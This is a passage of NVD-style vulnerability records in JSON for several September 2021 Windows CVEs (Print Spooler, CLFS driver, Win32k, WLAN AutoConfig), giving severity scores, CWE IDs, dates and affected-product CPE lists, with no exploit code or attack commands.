"cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:42:53", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-38671.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-40447", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:41:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-40447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40447", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:13", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38671, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38667", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:53:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-38667", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38667", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:13", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38671", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:52:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-38671", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38671", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:35:42", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36955, CVE-2021-38633.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-36963", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-24T18:15:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-36963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36963", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:35:40", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36963, CVE-2021-38633.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-36955", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-24T16:43:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-36955", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36955", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:09", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36975.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38639", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-26T21:31:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-38639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38639", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:35:44", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38639.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-36975", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-26T21:08:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2021-36975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36975", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:35:42", "description": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-36965", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36965"], "modified": "2021-09-25T11:27:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-36965", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", 